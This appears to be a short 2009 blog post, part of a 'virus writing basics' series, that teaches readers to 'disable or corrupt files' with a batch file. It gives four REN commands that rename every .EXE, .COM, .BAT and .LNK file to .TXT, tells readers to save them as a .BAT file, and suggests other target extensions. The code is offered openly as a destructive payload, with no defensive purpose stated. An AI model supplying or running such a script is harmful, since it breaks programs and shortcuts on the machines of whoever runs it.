phone: +91 8806117933
e-mail: dhirajpatil89@gmail.com

Monday, May 11, 2009

Virus code 16: Change Files extentions

Virus code 16: Change Files extentions

This is the virus writing basics section. Today we are going to show you to disable or corrupt files. This is demonstrated using batch programing/dos programing.

In order to corrupt files all that we do is change files to non-working TXT files or some other format.

REN *.EXE *.TXT

REN *.COM *.TXT

REN *.BAT *.TXT

REN *.LNK *.TXT



Just copy the above code into a Notepad file and save it .BAT This is not it You can even change files to any other extension like

*.JPEG *.DOC



*.COM means all files with extension .COM. Ren is a dos command to rename. The above cde just renames all . .COM files to .TXT.

0 comments: